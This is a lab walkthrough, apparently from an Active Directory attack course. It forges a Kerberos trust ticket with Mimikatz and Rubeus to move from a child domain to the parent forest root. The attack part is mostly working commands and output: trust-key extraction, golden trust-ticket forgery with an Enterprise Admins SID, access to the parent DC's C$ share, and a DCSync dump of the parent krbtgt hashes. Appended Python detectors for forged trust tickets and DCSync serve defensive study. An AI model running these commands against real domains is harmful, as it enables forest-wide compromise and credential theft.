Learning Objective - 18
Child to Parent using Trust Tickets
From the previous exercises we already have the trust keys of the domain (the NTLM hashes of the trust accounts):
SMB 172.16.2.1 445 DCORP-DC mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB 172.16.2.1 445 DCORP-DC US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB 172.16.2.1 445 DCORP-DC ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::
If we did not already have them, we could still extract them with any of these commands:
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Then we run Mimikatz to forge the trust ticket (an inter-realm TGT signed with the trust key). The /sids parameter places the parent domain's Enterprise Admins SID (RID 519) in the ticket's SIDHistory; because SID filtering is not enforced on trusts inside a forest, the parent DC honours that SID.
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f5b5c9f1ca76187393db1d3bb8ded94e /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\tickets\trust_tkt.kirbi" "exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f5b5c9f1ca76187393db1d3bb8ded94e /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\tickets\trust_tkt.kirbi
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: f5b5c9f1ca76187393db1d3bb8ded94e - rc4_hmac_nt
Service : krbtgt
Target : moneycorp.local
Lifetime : 3/4/2024 12:44:13 AM ; 3/2/2034 12:44:13 AM ; 3/2/2034 12:44:13 AM
-> Ticket : C:\AD\Tools\tickets\trust_tkt.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(powershell) # exit
Bye!
Then we use this ticket with Rubeus to request a service ticket for CIFS on the parent DC and inject it into the current session (/ptt).
PS C:\AD\Tools\tickets> ..\Rubeus.exe asktgs /ticket:C:\AD\Tools\tickets\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
doIFRDCCBUCgAwIBBaEDAgEWooIEJzCCBCNhggQfMIIEG6ADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIr
MCmgAwIBAqEiMCAbBGNpZnMbGG1jb3JwLWRjLm1vbmV5Y29ycC5sb2NhbKOCA9IwggPOoAMCARKhAwIB
C6KCA8AEggO8AwpqUTxrqk14Wmnulwq1KbWIfHnLq2j+1H4d9uwZ3DGW7oMIZQlVVws5i3yzMqw6ChDe
Nr+y6yavEWqQXdC70XFHK7xgAB4F8Vb4n6T6yV2pPYDzTI/EGenWwfC2zt6rYk+x/yzsfcAxaCfcyXj/
9rANq8CYBhqe5SCExz78/kvqmrfAs6bDQHR4jL5BkRcVnxXjC7EeTyAvWL6Jp9LerRJlB2lJJOIG6JZC
Yh3QaREis4pifLcxEN494in/U2r2l+8XhOMGKXMyfZXYCeetrMqK4IeLCuekQ54UcBptnPpKa31/uMTv
qkDD1rs4aa4U7y7m10ztfO5l4GsOWqBJBBcxP/HnIyqQhXckMKCzVSc1Gou41Ore0dW5v5xha0S6j8q2
wLdjtijmsUv77ejoV/jHG3WBIU50dUABVKvj0ptngZZWU7hFvzHOIBNTy027KWN9+SXODRxQf7xsE2Tb
4+gPVftL6WZgoU1m4GrWl6yFfeu9RWzyolTQ8oyXFMoJo1PLXVW0zN0/S+C/8BPpy8hfTxTNtJixC98W
P6NNq7FONlu+Him/DwhGAfwLcfSLWspANBS5fqqpA+ZUDcAidZ5Mt+dJnCZ8DMQv8CDHc+vF1GA2+Quy
H3MVVGOzNH4ThGejDxDoYp1sPn+E+pbp5URlQ5UpXBSEQ0Gq0odf8umS++pFnDdfIOC04KjAXZAKiC5V
QdzWrAeHZ85PikpLPhe34naGXqtdCZ0b3yLkPKrLaLte4TRgl+pl1aedQHVaXM6wAGtldt9hgoIk1cNR
XUaoQL/BJLDpBoSZQjcboFLSVx5zX0vunbrcpDo5FwhwP328eK67+3I+VyWp/++VB4o1OYe7UsEh6r0v
tYz3LrsiwNC+/fEk/Uq9CsWiQBEiVQPz4Ap2XEX3+f1trglaOkeF1IuK/RDptdWunuff9mbBYItQ5h2m
cqZBVIjjBebYmFRtpfXrsqRDAF+I9PbUsIWt3O1HMixOoqj7sJChNFV0+I1IaDZJBmNTSnz/V4oVpaU6
5ltygsDAqiy1qFZuC5UPK9LhAm7hIEyByj+KpO0ZE5hTThD5vKYnXNmtqjSUU2AqzugnR2Wd1vZML7rp
O4FqffMfWcUKjr1ev8P9ag6YNmFkzEdmU0AcN4v/W68zvnYpFWaEcbJAkt7F2yt3u3XRROorPfl2MzeX
XCJOeVUeg+kjKZo12eR1iOSv+6itNlxzRW8F9fTXC43DbrQb0DYF47jGOdEIouB9KXjZ/YlLo+UP0v6m
FW3DmBSjggEHMIIBA6ADAgEAooH7BIH4fYH1MIHyoIHvMIHsMIHpoCswKaADAgESoSIEIBq1KriszNTY
nMLdIN8X17MhYisUeV7dQV3FNzkmYwx+oRwbGmRvbGxhcmNvcnAubW9uZXljb3JwLmxvY2FsohowGKAD
AgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKUAAKURGA8yMDI0MDMwNDA4NDQzNVqmERgPMjAyNDAz
MDQxODQ0MzVapxEYDzIwMjQwMzExMDg0NDM1WqgRGw9NT05FWUNPUlAuTE9DQUypKzApoAMCAQKhIjAg
GwRjaWZzGxhtY29ycC1kYy5tb25leWNvcnAubG9jYWw=
ServiceName : cifs/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 3/4/2024 12:44:35 AM
EndTime : 3/4/2024 10:44:35 AM
RenewTill : 3/11/2024 1:44:35 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : GrUquKzM1Nicwt0g3xfXsyFiKxR5Xt1BXcU3OSZjDH4=
Then we verify that the ticket is in the cache.
PS C:\AD\Tools\tickets> klist
Current LogonId is 0:0xe922452
Cached Tickets: (1)
#0> Client: Administrator @ dollarcorp.moneycorp.local
Server: cifs/mcorp-dc.moneycorp.local @ MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 3/4/2024 0:44:35 (local)
End Time: 3/4/2024 10:44:35 (local)
Renew Time: 3/11/2024 0:44:35 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
PS C:\AD\Tools\tickets>
And then we list the C$ share of the parent domain's DC.
PS C:\AD\Tools\tickets> ls \\mcorp-dc.moneycorp.local\c$
Directory: \\mcorp-dc.moneycorp.local\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/10/2022 9:53 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 11/11/2022 6:33 AM Users
d----- 1/10/2024 1:35 AM Windows
We can also load the ticket using kekeo.
.\asktgs.exe C:\AD\Tools\tickets\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
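From the defender's side, the distinctive trait of the procedure above is that the parent DC (mcorp-dc) issues service tickets for a child-domain account whose TGT was never issued by the child DC (dcorp-dc): the forged trust ticket skips the AS exchange entirely. The following added example (not part of the original walkthrough) correlates Windows Security events 4768 (TGT requested) and 4769 (service ticket requested) and flags cross-realm 4769 records with no matching 4768 for the same account and client address inside the default 10-hour TGT lifetime. The sample events and client IPs are constructed for the example; the field names follow the EventData of the real events.

```python
from datetime import datetime, timedelta

# Constructed sample events (not taken from the page). Field names mirror the
# EventData of Windows Security events 4768 (Kerberos TGT requested, logged by
# the account's home DC) and 4769 (Kerberos service ticket requested, logged
# by the DC that issued the TGS). Client IP addresses are made up.
SAMPLE_EVENTS = [
    # benign: svcuser obtained a TGT from dcorp-dc, then a cross-realm TGS
    {"EventID": 4768, "Computer": "dcorp-dc.dollarcorp.moneycorp.local",
     "Time": "2024-03-04T00:40:02", "TargetUserName": "svcuser",
     "TargetDomainName": "DOLLARCORP.MONEYCORP.LOCAL", "IpAddress": "172.16.100.77"},
    {"EventID": 4769, "Computer": "mcorp-dc.moneycorp.local",
     "Time": "2024-03-04T00:41:10",
     "TargetUserName": "svcuser@DOLLARCORP.MONEYCORP.LOCAL",
     "TargetDomainName": "DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "cifs/mcorp-dc.moneycorp.local",
     "IpAddress": "172.16.100.77", "TicketEncryptionType": "0x12"},
    # suspicious: a TGS for a child-domain account at the parent DC, but the
    # child DC never logged a TGT for that account/client pair
    {"EventID": 4769, "Computer": "mcorp-dc.moneycorp.local",
     "Time": "2024-03-04T00:44:35",
     "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "TargetDomainName": "DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "cifs/mcorp-dc.moneycorp.local",
     "IpAddress": "172.16.100.64", "TicketEncryptionType": "0x12"},
    # same-realm request at the parent DC: out of scope for this check
    {"EventID": 4769, "Computer": "mcorp-dc.moneycorp.local",
     "Time": "2024-03-04T00:50:00",
     "TargetUserName": "backupsvc@MONEYCORP.LOCAL",
     "TargetDomainName": "MONEYCORP.LOCAL",
     "ServiceName": "ldap/mcorp-dc.moneycorp.local",
     "IpAddress": "172.16.1.50", "TicketEncryptionType": "0x12"},
]


def _when(event):
    return datetime.fromisoformat(event["Time"])


def _dc_realm(computer):
    # "mcorp-dc.moneycorp.local" -> "MONEYCORP.LOCAL"
    return computer.split(".", 1)[1].upper()


def _account(event):
    # 4769 records the client as user@REALM, 4768 records the bare name
    return event["TargetUserName"].split("@", 1)[0].lower()


def find_tgs_without_tgt(events, window=timedelta(hours=10)):
    """Return cross-realm 4769 events with no 4768 for the same account and
    client address within `window` before the TGS request."""
    tgt_times = {}
    for ev in events:
        if ev["EventID"] == 4768:
            key = (_account(ev), ev["IpAddress"])
            tgt_times.setdefault(key, []).append(_when(ev))

    alerts = []
    for ev in events:
        if ev["EventID"] != 4769:
            continue
        # only tickets issued to accounts from another realm than the DC's own
        if ev["TargetDomainName"].upper() == _dc_realm(ev["Computer"]):
            continue
        when = _when(ev)
        prior = tgt_times.get((_account(ev), ev["IpAddress"]), [])
        if any(when - window <= t <= when for t in prior):
            continue
        alerts.append({
            "time": ev["Time"],
            "user": ev["TargetUserName"].split("@", 1)[0],
            "realm": ev["TargetDomainName"],
            "service": ev["ServiceName"],
            "client": ev["IpAddress"],
            "dc": ev["Computer"],
        })
    return alerts


if __name__ == "__main__":
    for a in find_tgs_without_tgt(SAMPLE_EVENTS):
        print(f"[!] {a['time']} {a['realm']}\\{a['user']} got {a['service']} "
              f"from {a['dc']} for client {a['client']} with no TGT issued")
```

The correlation only works when 4768 from every DC of the child domain and 4769 from the parent DC are collected centrally; a TGT obtained from a DC whose logs are missing, or a client that reuses a cached TGT older than the window, will produce false positives, so tune the window to the domain's TGT lifetime policy before alerting on it.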
Using another service, such as LDAP
We create the trust ticket in the usual way.
C:\AD\Tools>mimikatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f5b5c9f1ca76187393db1d3bb8ded94e /service:krbtgt /target:moneycorp.local /ticket:trust_tkt.kirbi" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f5b5c9f1ca76187393db1d3bb8ded94e /service:krbtgt /target:moneycorp.local /ticket:trust_tkt.kirbi
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: f5b5c9f1ca76187393db1d3bb8ded94e - rc4_hmac_nt
Service : krbtgt
Target : moneycorp.local
Lifetime : 3/4/2024 2:03:54 AM ; 3/2/2034 2:03:54 AM ; 3/2/2034 2:03:54 AM
-> Ticket : trust_tkt.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(commandline) # exit
Bye!
Then with Rubeus we request the service ticket, but this time for the LDAP service on the parent DC.
C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_tkt.kirbi /service:ldap/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'ldap/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
doIF3DCCBdigAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIr
MCmgAwIBAqEiMCAbBGxkYXAbGG1jb3JwLWRjLm1vbmV5Y29ycC5sb2NhbKOCBGowggRmoAMCARKhAwIB
C6KCBFgEggRU+03OnEP2whgc6Mr8DZQnF9e0TmYn7ScKjWZVDSLIyuFgdud7fpTcEEwWUtVy+UIuPXY4
neTohna7fjC5i7WxW2OOg/6OnT2qmS5c0tG0vOzmqQsi6mLjdgtuddL4rbdICeg8PdMrszPHy94d9eMA
7pdZppeyAQxXUVEokZ/ttKOILLpTRbfL+tJn5wnxbN2zbqUpJ0ct0vKC68JJ+4jBLYjMaS+VaXRDXI7N
hTcosFPhq1O1ZN/9hVXvFxx5JLAFYS7lorYfBk3l6pwF8bA1emznE+KtXxutkUroAV0V7BvSMFQoEONs
i0o5nI2ELYJnADhyXodbtxuKD31def3vkd6+dgALVw41gxGmpkT03Oyj+5DCsavFaAUmhvUEGieBeVG+
ID371oatgufPv2tep0OPRp4WebqoEOhuIiM2c2ecRNtJizRhqsKaAQK0IGuyVvnNtMVkWyWALxwRMTaj
RK6p6NjUzKXyYszFWTqAuB0XjhuuJyCE3bjDoqz2ryvRRqNZPiCtcry3JS56lHbnlRrfmOsvP6uhUSvm
QcktVSFFfTM6HHBSTKVBDA4h5NLWwPRcYRPKRiEOs8LX59K6EpqVXdh71CsAdE/vkGNCf8jNo7qqKimx
PF+UDtg4rqAhaDJkSJTFrhECsjS2vHT0R30JFnHjaxwQuLQ+dX5mUqtMZRFYZnVJaOEVFpoViRxR5mKZ
iU5fqO5iyohYr+1FDuIqjrkzeU8NgYxwmqMkstSXifzEPTzPKQbU5UjRAzJIwmjlqGyyJ5Rcv7xGrOEj
8U45xphz+fCULUhkDaJmllrSRF0BhWTlDoIeo83p7FGpxu3NqXwKjI4kNhRcEjarkOei78kR4jPNUMTY
hhNHie+QXSY5o5a0KbFV/ZUVcmDyWL0NtjoBymffbdXnhhAyNXvvZR2wiq33vLbV3uizs4TZV96jrFfB
iTVIaInJdwtMU/xzcvlryGsVGp/p9H17A9oS+knUME5U30rjEdtzL0I7a7EvHKoXMB6jqN6fsOjkPR/c
XtqkOGHOzmBBuzIknQy7exo2EKM0JSLRrNmyiw7eK15Hz1g9xR+FqQrnIt127lqKOvIpXX8ldD0pQnvP
39BA/dBW8azNkc+51fG4AOBQ//2t/NXmJ2XKwKr5IHNK1L5Tbs5Teh/QChYIORPkJePX0v6lNOXL5Vv/
eKnW7Y6x70IQ5Xo2ZPJyHIDJyRt8Ez6S3pfiYM8r+lWc/5puA9eQ+n2o/h8KQBVK1JEoqB7tYVQVRlps
xwYeyb8xYcsb1aTPLF8+jKak8rGfx2ran0KJPjwaKMqCq1kBUQ7oufB2pMG8fTs+/MfNhoYxs9KFwlK/
SAe/iS76w9LEBMEKp3IOyhRMlRg5/C0ET43fyip4rK4EO4OwNlWUxwGd/9ClzJ6NmsknyUMLiUPiPmf6
YT7TkrlKR344fnWipGH/3X29yqTJ5Q3WUbeXXRMuMVjE1KKbp6OCAQcwggEDoAMCAQCigfsEgfh9gfUw
gfKgge8wgewwgemgKzApoAMCARKhIgQgzVRECQa2o6gQKNKKsn+6DCGmkeQZKrcUmybcgyuawyOhHBsa
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBA
pQAApREYDzIwMjQwMzA0MTAwNDI2WqYRGA8yMDI0MDMwNDIwMDQyNlqnERgPMjAyNDAzMTExMDA0MjZa
qBEbD01PTkVZQ09SUC5MT0NBTKkrMCmgAwIBAqEiMCAbBGxkYXAbGG1jb3JwLWRjLm1vbmV5Y29ycC5s
b2NhbA==
ServiceName : ldap/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 3/4/2024 2:04:26 AM
EndTime : 3/4/2024 12:04:26 PM
RenewTill : 3/11/2024 3:04:26 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : zVRECQa2o6gQKNKKsn+6DCGmkeQZKrcUmybcgyuawyM=
Then, with the LDAP ticket injected, we run DCSync against the moneycorp.local domain.
C:\AD\Tools>mimikatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502
Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
lm - 0: 87836055143ad5a507de2aaeb9000361
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7c7a5135513110d108390ee6c322423f
* Primary:Kerberos-Newer-Keys *
Default Salt : MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442
des_cbc_md5 (4096) : c20dc80d51f7abd9
* Primary:Kerberos *
Default Salt : MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : c20dc80d51f7abd9
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 49fec950691bbeba1b0d33d5a48d0293
02 0b0c4dbc527ee3154877e070d043cd0d
03 987346e7f810d2b616da385b0c2549ec
04 49fec950691bbeba1b0d33d5a48d0293
05 0b0c4dbc527ee3154877e070d043cd0d
06 333eda93ecfba8d60c57be7f59b14c62
07 49fec950691bbeba1b0d33d5a48d0293
08 cdf2b153a374773dc94ee74d14610428
09 cdf2b153a374773dc94ee74d14610428
10 a6687f8a2a0a6dfd7c054d63c0568e61
11 3cf736e35d2a54f1b0c3345005d3f962
12 cdf2b153a374773dc94ee74d14610428
13 50f935f7e1b88f89fba60ed23c8d115c
14 3cf736e35d2a54f1b0c3345005d3f962
15 06c616b2109569ddd69c8fc00c6a413c
16 06c616b2109569ddd69c8fc00c6a413c
17 179b9c2fd5a34cbb6013df534bf05726
18 5f217f838649436f34bbf13ccb127f44
19 3564c9de46ad690b83268cde43c21854
20 1caa9da91c85a1e176fb85cdefc57587
21 27b7de3c5a16e7629659152656022831
22 27b7de3c5a16e7629659152656022831
23 65f5f95db76e43bd6c4ad216b7577604
24 026c59a45699b631621233cb38733174
25 026c59a45699b631621233cb38733174
26 342a52ec1d3b39d90af55460bcda72e8
27 ef1e1a688748f79d16e8e32318f51465
28 9e93ee8e0bcccb1451face3dba22cc69
29 480da975c1dfc76717a63edc6bb29d7b
mimikatz(commandline) # exit
Bye!
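The DCSync above is a directory replication request, and a DC that has "Audit Directory Service Access" enabled records it as Security event 4662 whose Properties list the replication control-access GUIDs. The following added detection example (not part of the original walkthrough) scans constructed 4662 records and flags any subject that exercised DS-Replication-Get-Changes rights without being a known domain controller account. The allowlist and sample records are constructed for the example; the three GUIDs are the real schema values of those extended rights.

```python
import re

# Real control-access right GUIDs as they appear in the Properties field of
# Security event 4662 when replication is requested.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed allowlist: computer accounts of the domain controllers that are
# expected to replicate with each other. Hybrid-identity sync accounts
# (e.g. Azure AD Connect) would also need to be added in a real deployment.
DC_ACCOUNTS = {"MCORP-DC$", "DCORP-DC$"}

# Constructed sample 4662 records (not taken from the page). Properties keeps
# the tab/newline layout the Security log uses for the GUID list.
SAMPLE_4662 = [
    # normal replication between domain controllers
    {"SubjectUserName": "DCORP-DC$", "SubjectDomainName": "DOLLARCORP",
     "ObjectName": "DC=moneycorp,DC=local", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # a user account pulling the full directory: DCSync behaviour
    {"SubjectUserName": "Administrator", "SubjectDomainName": "DOLLARCORP",
     "ObjectName": "DC=moneycorp,DC=local", "AccessMask": "0x100",
     "Properties": ("Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                    "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")},
    # unrelated property access by a user: not replication, not flagged
    {"SubjectUserName": "helpdesk1", "SubjectDomainName": "MONEYCORP",
     "ObjectName": "CN=someuser,CN=Users,DC=moneycorp,DC=local",
     "AccessMask": "0x20",
     "Properties": "Write Property\n\t{bf967a68-0de6-11d0-a285-00aa003049e2}"},
]

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def replication_rights_in(properties):
    """Names of the replication rights referenced by a 4662 Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(properties)}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS):
    """Flag 4662 events where a non-DC subject used replication rights."""
    alerts = []
    for ev in events:
        rights = replication_rights_in(ev["Properties"])
        if not rights:
            continue
        subject = ev["SubjectUserName"]
        if subject.upper() in dc_accounts:
            continue
        alerts.append({
            "subject": f"{ev['SubjectDomainName']}\\{subject}",
            "object": ev["ObjectName"],
            "rights": rights,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_4662):
        print(f"[!] {a['subject']} replicated {a['object']}: {', '.join(a['rights'])}")
```

Beyond alerting, the durable mitigation for what the walkthrough demonstrates is to treat the forest, not the domain, as the security boundary: a child-domain compromise exposes the parent's krbtgt key exactly as shown, and after such an incident that key must be rotated twice.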